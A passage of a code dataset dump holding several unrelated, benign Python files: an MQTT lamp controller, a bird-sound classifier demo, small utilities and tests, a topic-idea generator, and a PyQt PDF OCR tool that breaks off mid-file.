to be tweaked\r\n if ratio_action == 1:\r\n if RATIO < 10:\r\n RATIO += 1\r\n elif ratio_action == 0:\r\n if RATIO > 0:\r\n RATIO -= 1\r\n elif ratio_action == 2:\r\n RATIO = 5\r\n sender(self, 2, RATIO * 25)\r\n\r\ndef on_publish(self, userdata, msg):\r\n print(\"data published \\n\")\r\n\r\ndef main():\r\n client = mqtt.Client()\r\n client.username_pw_set(user, password=None)\r\n client.on_connect = on_connect # Create connection to the server\r\n client.on_message = listener # Open received message from the server\r\n client.on_publish = on_publish # Get acknowledgement that publishment has done\r\n\r\n client.connect(broker_address, port = port)\r\n client.loop_start()\r\n client.subscribe([(\"zigbee2mqtt/IKEA_SWITCH\", 0), (\"zigbee2mqtt/IKEA_LAMP\", 0)]) # Params: topic name and qos level\r\n\r\n while Connected != True: # Poll the server until the connection is established\r\n time.sleep(0.1)\r\n\r\n try:\r\n while True: # Keep the script running until interrupted\r\n time.sleep(1)\r\n except KeyboardInterrupt:\r\n print(\"exiting\")\r\n client.disconnect()\r\n client.loop_stop()\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"156595464","text":"import matplotlib.pyplot as mp\nimport numpy as np\nimport pickle\nimport sys\nimport csv\n\nfrom signalproc import AudioSignal\n\ndef read_real_classes(file_name, birds):\n result = {}\n with open(file_name, \"r\") as file:\n reader = csv.reader(file)\n for row in reader:\n result[int(row[0])] = [birds[i] for i, e in enumerate(row[1:]) if int(e) > 0]\n\n result[-1] = \"Not found real data\"\n return result\n\ndef read_classes(file_name):\n with open(file_name, \"r\") as f:\n return f.readlines()\n\ndef restore_classificator(file_name):\n with open(file_name, \"rb\") as f:\n return pickle.load(f)\n\ndef plot(audio, x):\n mp.subplot(2, 1, 1)\n mp.specgram(audio.samples, NFFT=1024, Fs=audio.framerate, noverlap=900)\n mp.title(\"Spectrogram\")\n mp.subplot(2, 1, 2)\n mp.plot(x)\n mp.title(\"MSMS\")\n mp.show()\n\ndef get_test_number(file_name):\n try:\n if len(file_name) < len(\"nips4b_birds_trainfile000\"):\n raise ValueError\n return int(file_name[-7:-4])\n except ValueError:\n return -1\n\nprint(sys.argv[1])\nbirds = read_classes(\"birds.csv\")\nreal = read_real_classes(\"real.csv\", birds)\nclf = restore_classificator(\"classificator.pyobj\")\n\naudio = AudioSignal(sys.argv[1])\nc = audio.mel_spectra()\n\nplot(audio, c)\n\npredicted = clf.predict_proba(c)[0]\npb = [(predicted[x], birds[x]) for x in range(len(birds)-1)]\npb = sorted(pb, key=lambda x:x[0], reverse=True)[0:7]\npb = [\"{0:0.2}\".format(x[0]) + \" - \" + str(x[1]) for x in pb]\n\nprint(\"Predicted:\")\nprint(\"Probability - Class, Name\")\nfor i in pb:\n print(i, end=\"\")\n\nreal_number = get_test_number(sys.argv[1])\nprint(\"\\nReal:\")\nfor i in real[real_number]:\n print(i, end=\"\")\nprint(\"\")\n","sub_path":"Demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"414156288","text":"import cv2\nimport numpy as np\n\n# Show original image\nimage = cv2.imread(\"jurassic-park-tour-jeep.jpg\")\ncv2.imshow(\"original\", image)\ncv2.waitKey(0)\ncv2.destroyWindow(\"original\")\n\n# Shrink or expand image\nratio = 100.0/image.shape[1]\nnew_dim = (100, 
int(image.shape[0]*ratio))\n\nresized = cv2.resize(image, new_dim, interpolation = cv2.INTER_AREA)\ncv2.imshow(\"resized\", resized)\ncv2.waitKey(0)\ncv2.destroyWindow(\"resized\")","sub_path":"shrink_resize.py","file_name":"shrink_resize.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"562781345","text":"class Solution(object):\n def isValid(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = []\n p_dict = {\n ']' : '[',\n ')' : '(',\n '}' : '{'\n }\n for e in s:\n if e in p_dict.values():\n stack.append(e)\n elif e in p_dict.keys():\n if not stack or stack.pop() != p_dict[e]:\n return False\n else:\n return False\n return not stack\n\n # this is a more intuitive solution [EASY]\n def isValid_alt1(self, s):\n \"\"\"\n :type s: str\n :rtype: bool\n \"\"\"\n stack = []\n for e in s:\n if e == '[' or e == '{' or e == '(':\n stack.append(e)\n elif not stack:\n return False\n elif e == ']' and stack.pop() != '[':\n return False\n elif e == '}' and stack.pop() != '{':\n return False\n elif e == ')' and stack.pop() != '(':\n return False\n return not stack\n\n # this is an alternative solution with a trick [EASY]\n def isValid_alt2(self, s):\n if not s:\n return True\n if len(s) % 2 != 0:\n return False\n while '()' in s or '[]' in s or '{}' in s:\n s = s.replace('()', '').replace(\"[]\", '').replace('{}', '')\n return not s","sub_path":"python/020_Valid_Parentheses.py","file_name":"020_Valid_Parentheses.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"639502559","text":"__author__ = 'mwagner'\n\nfrom sqlalchemy import ForeignKey, Column, String, Integer, Numeric\nfrom CtFineForTaxPayment import *\nfrom ClPaymentFrequency import *\nfrom CtTaxAndPricePayment import *\n\n\nclass CtTaxAndPrice(Base):\n\n __tablename__ = 'ct_tax_and_price'\n\n record = Column(String, ForeignKey('ct_ownership_record.record_no'), primary_key=True)\n person = Column(String, ForeignKey('bs_person.person_id'), primary_key=True)\n share = Column(Numeric)\n area = Column(Integer)\n value_calculated = Column(Integer)\n price_paid = Column(Integer)\n land_tax = Column(Integer)\n grace_period = Column(Integer)\n base_value_per_m2 = Column(Integer)\n base_tax_rate = Column(Numeric)\n subsidized_area = Column(Integer)\n subsidized_tax_rate = Column(Numeric)\n\n # foreign keys:\n payment_frequency = Column(Integer, ForeignKey('cl_payment_frequency.code'))\n payment_frequency_ref = relationship(\"ClPaymentFrequency\")\n\n payments = relationship(\"CtTaxAndPricePayment\", backref='tax_ref', lazy='dynamic', cascade=\"all, delete, delete-orphan\")\n fine_payments = relationship(\"CtFineForTaxPayment\", backref='tax_ref', lazy='dynamic', cascade=\"all, delete, delete-orphan\")","sub_path":"model/CtTaxAndPrice.py","file_name":"CtTaxAndPrice.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"590255790","text":"import numpy as np\n\nBLOCK_SIZE = 4096\nII = np.iinfo(np.int32)\n\nDEVICES = {\n 'FLOW 8 (Recording)': {\n '1-2': slice(0, 2),\n '3-4': slice(2, 4),\n '5-6': slice(4, 6),\n '7-8': slice(6, 8),\n 'Main': slice(8, 10)\n },\n 'MacBook Pro Microphone': {\n '1': slice(0, 1)\n },\n 'USB PnP Sound Device': {\n '1': slice(0, 1)\n },\n 'ZoomAudioDevice': {\n '1-2': slice(0, 2)\n },\n}\n\n\ndef emit_blocks():\n rng = 
np.random.default_rng(23)\n\n    while True:\n        for device_name, device in DEVICES.items():\n            for channel_name, sl in device.items():\n                count = sl.stop - sl.start\n                frame = rng.integers(II.min, II.max, (count, BLOCK_SIZE))\n\n                yield frame, channel_name, device_name\n","sub_path":"test/mock_data.py","file_name":"mock_data.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168917887","text":"#!/usr/bin/env python\n#\n# Copyright 2009 Sebastian Raaphorst.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Unit testing for the permtj module.\n\nBy Sebastian Raaphorst, 2009.\"\"\"\n\nimport unittest\nfrom functools import reduce\n\nfrom . import permtj\nfrom . import combfuncs\n\nclass Tester(unittest.TestCase):\n    \"\"\"Unit testing class for this module.\n    We perform all operations and check their interactions for correctness.\"\"\"\n\n    def setUp(self):\n        self.n = 5\n\n    def testall(self):\n        \"\"\"Test the interactions between all functions.\"\"\"\n\n        # We iterate over all permutations, and check their rank to make sure\n        # it is as expected. Unrank the rank and make sure the unranked\n        # permutation corresponds to what we have. This does not test succ\n        # explicitly, but as this is called by all, it is implicitly tested.\n        rk = 0\n        for P in permtj.all(self.n):\n            # Check to make sure that the rank of K is rk.\n            self.assertEqual(permtj.rank(self.n, P), rk)\n\n            # Check to make sure that unranking rk gives K.\n            self.assertEqual(permtj.unrank(self.n, rk), P)\n\n            # Increment the rank.\n            rk += 1\n\n        # Make sure that we saw the correct number of permutations, namely n!\n        self.assertEqual(rk, reduce(lambda x,y:x*y, range(1,self.n+1), 1))\n\n\nif __name__ == '__main__':\n    unittest.main()\n\n","sub_path":"pyncomb/permtjtest.py","file_name":"permtjtest.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272219852","text":"import argparse\nimport csv\nfrom random import randint\n\n\ndef Apply_the_process_A_to_B(subject_list):\n\tsubject_dict = {1: Key_Accounting_list, 2: Key_Computer_Science_list, \\\n                 3: Key_Information_Management_list, 4: Key_Physics_list,\\\n                 5: Key_Political_Science_list, 6: Key_Properties_list,\\\n                 7: Key_Banking_Finance_Insurance_list, 8: Key_Management_Science_list, \\\n                 9: Key_Military_list, 10: Key_Religions_list}\n\n\tsubject_department_dict = {1: 'Accounting', 2: 'Computer Science', \\\n                 3: 'Information Management', 4: 'Physics',\\\n                 5: 'Political Science', 6: 'Properties',\\\n                 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n                 9: 'Military', 10: 'Religions'}\n\ttopics = []\n\t#for i in range(0, len(subject_list)):\n\tfor i in range(1, len(subject_list)):\n\t\t#randint is inclusive on both ends, so the upper bound must be len - 1\n\t\trandom_index = randint(0, len(subject_dict[int(subject_list[i])]) - 1)\n\t\ttmp_list = subject_dict[int(subject_list[i])]\n\t\ttopics.append(tmp_list[random_index][0])\n\treturn topics\n\n#def 
Apply_the_concept_A_to_B(subject_list):\n#\ttopics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#def Any_common_things_among(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#\t\n#def Any_different_things_among(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#def Combining_these_things_to_invent(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\n#def Can_we_improve(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\t\n#\t\n#def If_there_is_no(subject_list):\n# topics=[]\n# for i in range(0, len(subject_list)):\n# random_index = randint(0, len(subject_dict[subject_list[i]]))\n# tmp_list = subject_dict[subject_list[i]]\n# topics.append(tmp_list[random_index][0])\n# return topics\n#\nif __name__ == '__main__':\n\t#print('hello');\n\tsubject_department_dict_for_main = {1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"arguments\", nargs=\"+\", help=\"Available previously generated models. 
First one will be used by MCTS, and the others to compare the final team composition.\")\n\targs = parser.parse_args()\n\tsub_dept_dict = {1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\tsub_reverse_keys = {'Accounting': '1', 'Computer Science': '2', \\\n 'Information Management': '3', 'Physics': '4',\\\n 'Political Science': '5', 'Properties': '6',\\\n 'Banking, Finance, Insurance': '7', 'Management Science': '8', \n 'Military': '9', 'Religions': '10',1: 'Accounting', 2: 'Computer Science', \\\n 3: 'Information Management', 4: 'Physics',\\\n 5: 'Political Science', 6: 'Properties',\\\n 7: 'Banking, Finance, Insurance', 8: 'Management Science', \n 9: 'Military', 10: 'Religions'}\n\t#print(sub_dept_dict[1]);\n\t#print('Hello World, I am back');\n\t#for i in (1, len(sub_dept_dict)):\n\t#\tprint(str(i)+':'+sub_dept_dict[i]);\n\t#\t#print('\\n');\n\t#def load_csv_data_to_list():\n\t#path_py = 'C:/rest/SJSU/Summer Sem/ML CMPE257/Tech Alchemy/nodejs_forum/python_gen/';\n\tpath_py = args.arguments[0];\n\targs.arguments[1] = sub_reverse_keys[args.arguments[1]];\n\targs.arguments[2] = sub_reverse_keys[args.arguments[2]];\n\t#print(path_py);\n\twith open(path_py+'CSV_Accounting.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Accounting_list = list(reader)\n\t\n\t#print(Key_Accounting_list[3][0])\n\t\n\twith open(path_py+'CSV_Banking_Finance_Insurance.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Banking_Finance_Insurance_list = list(reader)\n\t\n\t#print(Key_Banking_Finance_Insurance_list[3][0])\n\t\n\twith open(path_py+'CSV_Computer_Science.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Computer_Science_list = list(reader)\n\t\n\t#print(Key_Computer_Science_list[3][0])\n\t\n\t\n\twith open(path_py+'CSV_Information_Management.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Information_Management_list = list(reader)\n\t\n\t#print(Key_Information_Management_list[3][0])\n\t\n\twith open(path_py+'CSV_Physics.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Physics_list = list(reader)\n\t\n\twith open(path_py+'CSV_Political_Science.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Political_Science_list = list(reader)\n\t\n\t#print(Key_Political_Science_list[3][0])\n\t\n\t#print(Key_Physics_list[3][0])\n\t\n\twith open(path_py+'CSV_Properties.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Properties_list = list(reader)\n\t\n\t#print(Key_Properties_list[3][0])\n\t\n\twith open(path_py+'CSV_Management_Science.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Management_Science_list = list(reader)\n\t\n\t#print(Key_Management_Science_list[3][0])\n\t\n\twith open(path_py+'CSV_Military.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Military_list = list(reader)\n\t\n\t#print(Key_Military_list[3][0])\n\t\n\t\n\twith open(path_py+'CSV_Religions.csv', 'r') as f:\n\t\treader = csv.reader(f)\n\t\tKey_Religions_list = list(reader)\n\t\n\t#print(Key_Religions_list[3][0])\n\t\n\tsub_list = list();\n\tideas_apply_process = list();\n\tideas_apply_concept = list();\n\tideas_common_things = list();\n\tideas_apply_properties = list();\n\tideas_combine = list();\n\tideas_combine = list();\n\tideas_if_there_is_no = list();\n\t\n\tfor i in range(1, 
len(args.arguments)):\n\t\t#print(args.arguments[i]);\n\t\tsub_list.append(sub_dept_dict[int(args.arguments[i])]);\n\t\t#print(sub_dept_dict[int(args.arguments[i])]);\n\t#print(sub_list);\n\t#load_csv_data_to_list();\n\t#subject_list = args.arguments;\n\t\n\tideas = Apply_the_process_A_to_B(args.arguments);\n\t\n\t#for idea in ideas:\n\t\t#print(idea);\n\t\n\tidea_strings = list();\n\tconcept_idea_1 = \"Apply the concept of \"+ ideas[0]+ \" in \"+ subject_department_dict_for_main[int(args.arguments[1])] + \" to \" + ideas[1] + \" in \"+subject_department_dict_for_main[int(args.arguments[2])];\n\tconcept_idea_2 = \"Apply the concept of \"+ ideas[1]+\" in \"+ subject_department_dict_for_main[int(args.arguments[2])] + \" to \" + ideas[0] + \" in \"+subject_department_dict_for_main[int(args.arguments[1])];\n\tdifference_common = \"Any different/ common things among \"+ ideas[0]+ \" from department \"+subject_department_dict_for_main[int(args.arguments[1])];\n\tcombine_idea = \" Combining these things : \"+ideas[0] +\" to invent new object\";\n\timprove_idea = \"Can we improve :\"+ideas[0] + \" in \" + subject_department_dict_for_main[int(args.arguments[1])];\n\tidea_strings.append(concept_idea_1);\n\tidea_strings.append(concept_idea_2);\n\tidea_strings.append(difference_common);\n\tidea_strings.append(combine_idea);\n\tidea_strings.append(improve_idea);\n\tidea_string_single_line ='';\n\tfor idea in idea_strings:\n\t\tidea_string_single_line+=idea+'||';\n\t\n\tprint(idea_string_single_line);\n\t","sub_path":"idea_gen_to_send/python_gen/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"90265221","text":"from PyQt5 import QtCore as qtc, QtGui as qtg, QtWidgets as qtw\nimport sys, os, shutil, logging\n\nlogging.basicConfig(filename='mfmcOCR.log', format='%(asctime)s %(name)s %(levelname)s:%(message)s', level=logging.WARNING)\nlogger = logging.getLogger (__name__)\n\n\nimport sys, os, shutil\nimport pdfplumber\n# import PyPDF2\n# import fitz # import for PyMuPDF\nfrom pdf2image import convert_from_path\nimport cv2\nimport pytesseract\nimport numpy as np\nimport imutils\nimport time\nimport ctypes\nmyappid = u'MFMC.MFMC-OCR.OCR.10' # set taskbar icon\nctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n\nfrom textbox import Ui_MainWindowOCR\nfrom preview import Ui_MainWindowPreview\nfrom waiting import Ui_FormWaiting\nfrom loading import Ui_FormLoading\nfrom QOveride import MyQProgressDialog, Worker\n\n\n\nclass MainWindow(qtw.QMainWindow, Ui_MainWindowOCR):\n # Signals\n saveCurrentPreviewsSignal = qtc.pyqtSignal(bool)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n #variables\n self.PDF_file = \"\"\n self.numPages = 0\n self.curPage = 1\n self.tempPath = \"\\\\OCR10temp\"\n self.curImg = np.array([])\n self.curStraightImg = None\n self.curPath = \"\"\n self.curAngle = 0\n self.curPagePreviews = [] #Different previews of current page as list\n self.save_file = \"\"\n self.saved = True\n self.mainChanged = True #tracker for whether Main changed\n self.progress = 0\n \n\n self.setupUi(self)\n # A list of all format-related widgets/actions, so we can disable/enable signals when updating.\n self.window2 = PreviewWindow()\n self.window2.move(850,25)\n\n\n self._format_actions = [\n # self.fonts,\n # self.fontsize,\n self.actionBold,\n self.actionItalic,\n self.actionUnderline\n # We don't need to disable signals for alignment, 
as they are paragraph-wide.\n ]\n\n\n # self.tabWidget.setCurrentIndex(0)\n self.update_format()\n self.openFile()\n \n\n \n\n #connect to slots\n self.actionOpen_File.triggered.connect (self.openFile)\n self.action_Save.triggered.connect (self.save)\n self.actionSave_As.triggered.connect (self.saveAs)\n self.actionQuit.triggered.connect (self.exit)\n self.actionCut.triggered.connect (self.cut_clicked)\n self.actionCopy.triggered.connect (self.copy_clicked)\n self.actionPaste.triggered.connect (self.paste_clicked)\n self.actionOCR_Page.triggered.connect (self.OCR_Page_selected)\n self.actionUndo.triggered.connect (self.undo_clicked)\n self.actionRedo.triggered.connect (self.redo_clicked)\n self.actionBold.toggled.connect (self.bold_toggled)\n self.actionItalic.toggled.connect (self.italic_toggled)\n self.actionUnderline.toggled.connect (self.underline_toggled)\n self.actionSelect_all.triggered.connect (self.select_all_clicked)\n self.actionAttributions.triggered.connect (self.attributions_selected)\n self.textEdit_Main.textChanged.connect (self.textChanged)\n self.actionCW90.triggered.connect (self.CW90_clicked)\n self.actionCCW90.triggered.connect (self.CCW90_clicked)\n self.action180.triggered.connect (self.R180_clicked)\n \n\n self.textEdit_Main.selectionChanged.connect(self.update_format)\n self.textEdit_Main.textChanged.connect(self.main_Changed)\n self.spinBox_Rotate.valueChanged.connect(self.rotate)\n self.spinBox_Page.valueChanged.connect(self.changePage)\n\n self.pushButton_OCR.clicked.connect (self.OCR_Page_selected)\n self.pushButton_CW.clicked.connect (self.CW90_clicked)\n self.pushButton_CCW.clicked.connect (self.CCW90_clicked)\n self.pushButton_FirstPage.clicked.connect (self.firstPage)\n self.pushButton_PrevPage.clicked.connect (self.prevPage)\n self.pushButton_NextPage.clicked.connect (self.nextPage)\n self.pushButton_LastPage.clicked.connect (self.lastPage)\n self.label_Image.wheelTurnUp.connect(self.prevPage)\n self.label_Image.wheelTurnDown.connect(self.nextPage)\n self.label_Image.dropFile.connect(self.dropPDF)\n\n self.saveCurrentPreviewsSignal.connect (self.saveCurrentPreviews)\n \n \n\n self.move(100,0)\n self.show()\n\n def dropPDF(self, filename):\n try:\n _, filename = filename.split('///')\n except:\n try:\n _, filename = filename.split(':')\n except:\n return\n if os.path.isfile(filename) and filename.lower().endswith(\".pdf\"):\n if not self.saved:\n ans = self.want_to_save()\n if ans == qtw.QMessageBox.Yes:\n self.save_file()\n elif ans == qtw.QMessageBox.Cancel:\n return\n self.PDF_file = filename\n\n self.loading = Loading()\n self.loading.show()\n self.setEnabled(False)\n self.window2.setEnabled(False)\n self.window2.hide()\n qtw.QApplication.processEvents()\n worker = Worker(self.changePDF, self.PDF_file)\n worker.start()\n self.progress = 0\n high =0\n while self.progress<1.1:\n time.sleep (0.0000000000005)\n if self.progress > high and high < 1:\n high = self.progress\n self.loading.progressBar.setValue(int(high * 100))\n qtw.QApplication.processEvents()\n self.label_totalPages.setText(f\"of {self.numPages}\")\n\n self.update_spinBox_Rotate (self.curAngle)\n\n self.window2.hide()\n self.window2.textEdit_Preview_1.setHtml(self.curPagePreviews[self.curPage-1][0])\n self.window2.textEdit_Preview_2.setHtml(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setHtml(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setHtml(self.curPagePreviews[self.curPage-1][3])\n\n self.setEnabled(True)\n 
self.window2.setEnabled(True)\n self.loading.close()\n\n # self.changePDF(self.PDF_file)\n\n def openFile (self):\n #choose PDF file to open\n if not self.saved:\n ans = self.want_to_save()\n if ans == qtw.QMessageBox.Yes:\n self.save_file()\n elif ans == qtw.QMessageBox.Cancel:\n return\n options = qtw.QFileDialog.Options()\n filename = \"\"\n filename, _ = qtw.QFileDialog().getOpenFileName(self,\"File to OCR\",\"\", \"PDF files (*.pdf);; All Files (*)\", options=options)\n if not filename:\n return\n self.PDF_file = filename\n\n self.loading = Loading()\n self.loading.show()\n self.setEnabled(False)\n self.window2.setEnabled(False)\n self.window2.hide()\n qtw.QApplication.processEvents()\n worker = Worker(self.changePDF, self.PDF_file)\n logging.info(\"location openFile 1\")\n worker.start()\n self.progress = 0\n high =0\n while self.progress<1.1:\n time.sleep (0.0000000000005)\n if self.progress > high and high < 1:\n high = self.progress\n self.loading.progressBar.setValue(int(high * 100))\n qtw.QApplication.processEvents()\n self.label_totalPages.setText(f\"of {self.numPages}\")\n logging.info(\"location openFile 2\")\n\n self.update_spinBox_Rotate (self.curAngle)\n\n self.window2.textEdit_Preview_1.setHtml(self.curPagePreviews[self.curPage-1][0])\n self.window2.textEdit_Preview_2.setHtml(self.curPagePreviews[self.curPage-1][1])\n self.window2.textEdit_Preview_3.setHtml(self.curPagePreviews[self.curPage-1][2])\n self.window2.textEdit_Preview_4.setHtml(self.curPagePreviews[self.curPage-1][3])\n logging.info(\"location openFile 3\")\n\n self.setEnabled(True)\n self.window2.setEnabled(True)\n self.loading.close()\n\n def changePDF (self, pdf_file):\n #change new PDF\n # pdf = fitz.open(pdf_file)\n # number_of_pages = pdf.pageCount\n # if number_of_pages == 0:\n # return\n # self.numPages = number_of_pages\n # self.curPagePreviews = []\n # for i in range(number_of_pages):\n # page = pdf.loadPage(i)\n # text = page.getText(\"text\")\n # if not text:\n # text = \"Direct PDF Text Not Available; Please check Previews 2 - 4\"\n # self.curPagePreviews.append([text,\"\",\"\",\"\"])\n\n\n\n # pdf = open(pdf_file, 'rb')\n # read_pdf = PyPDF2.PdfFileReader(pdf)\n \n # number_of_pages = read_pdf.getNumPages()\n # if number_of_pages == 0:\n # return\n # self.numPages = number_of_pages\n # self.curPagePreviews = []\n # for i in range(number_of_pages):\n # page = read_pdf.getPage(i)\n # text = page.extractText()\n # if text == None:\n # text = \"Direct PDF Text Not Available; Please check Previews 2 - 4\"\n # self.curPagePreviews.append([text,\"\",\"\",\"\"])\n\n\n logging.info(\"location ChangePDF1\")\n\n pdf = pdfplumber.open(pdf_file)\n pages = pdf.pages\n if len(pages) == 0:\n return\n self.numPages = len(pages)\n logging.info(\"location ChangePDF2\")\n self.curPagePreviews = []\n for page in pages:\n text = page.extract_text()\n if text == None:\n text = \"Direct PDF Text Not Available; Please check Previews 2 - 4\"\n self.curPagePreviews.append([text,\"\",\"\",\"\"])\n logging.info(\"location ChangePDF3\")\n \n\n self.progress = 0.1\n pages = convert_from_path(pdf_file, 350)\n self.progress = 0.5\n if not os.path.isdir(self.tempPath):\n os.mkdir(self.tempPath)\n i = 1\n logging.info(\"location ChangePDF4\")\n for page in pages:\n image_name = os.path.join(self.tempPath, \"Page_\" + str(i) + \".jpg\")\n page.save(image_name, \"JPEG\")\n self.progress = 0.5 + i/self.numPages/2\n i = i+1\n self.setPage(1, new=True)\n self.progress = 2\n logging.info(\"location ChangePDF5\")\n return\n\n def setPage 
(self, pageNo = 1, new=False):\n self.mainChanged = True\n self.saveCurrentPreviewsSignal.emit(new)\n self.curPage = pageNo\n image_name = os.path.join(self.tempPath, \"Page_\" + str(pageNo) + \".jpg\")\n if not os.path.exists (image_name):\n image_name = \":/newPrefix/mfmc logo 2015.jpg\"\n self.curPath = image_name\n self.curImg = cv2.imread(image_name) \n self.curStraightImg = self.curImg.copy() \n\n def showImg (self, img):\n height, width = img.shape[:2]\n bytesPerLine = 3 * width \n qImg = qtg.QImage(img.data, width, height, bytesPerLine, qtg.QImage.Format_RGB888)\n self.label_Image.setPixmap(qtg.QPixmap(qImg))\n\n def tesseractPage (self, img):\n self.progress = 0.1\n text = str(pytesseract.image_to_string(img, config='--psm 6'))\n self.progress = 0.4\n self.curPagePreviews[self.curPage-1][1] = text\n\n kernel = np.ones((1,1), np.uint8)\n img = cv2.dilate(img, kernel, iterations=1)\n img = cv2.erode(img, kernel, iterations=1)\n img = cv2.GaussianBlur(img, (5,5), 0)\n img = cv2.medianBlur(img,5)\n\n text = str(pytesseract.image_to_string(img, config='--psm 6'))\n self.progress = 0.70\n self.curPagePreviews[self.curPage-1][2] = text\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n adaptive_threshold = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 85, 11)\n img = adaptive_threshold\n\n text = str(pytesseract.image_to_string(img, config='--psm 6'))\n self.curPagePreviews[self.curPage-1][3] = text\n self.progress = 1.1\n\n def saveAs (self):\n options = qtw.QFileDialog.Options()\n filename = \"\"\n filename, _ = qtw.QFileDialog.getSaveFileName(self,\"Save to file\", self.save_file, \"text files (*.txt);;HTML files (*.html);; All Files (*)\", options=options)\n if filename:\n self.save_file = filename\n self.save()\n\n def save (self):\n if self.save_file == \"\":\n self.saveAs()\n else:\n with open(self.save_file, \"w\", encoding='utf-8') as f2:\n if self.save_file.lower().endswith('.html'):\n f2.write(self.textEdit_Main.toHtml())\n else:\n f2.write(self.textEdit_Main.toPlainText())\n self.saved = True\n\n def exit(self):\n if self.saved == False:\n ans = self.want_to_save()\n if ans == qtw.QMessageBox.Cancel:\n return\n elif ans == qtw.QMessageBox.Yes:\n self.save()\n try:\n shutil.rmtree(\"\\OCR10temp\", ignore_errors=True)\n except:\n pass\n\n self.window2.close()\n self.close()\n\n def want_to_save(self):\n #returns true if want to save unsaved data\n msgBox = qtw.QMessageBox()\n msgBox.setIcon(qtw.QMessageBox.Warning)\n msgBox.setText(\"Document not saved. 
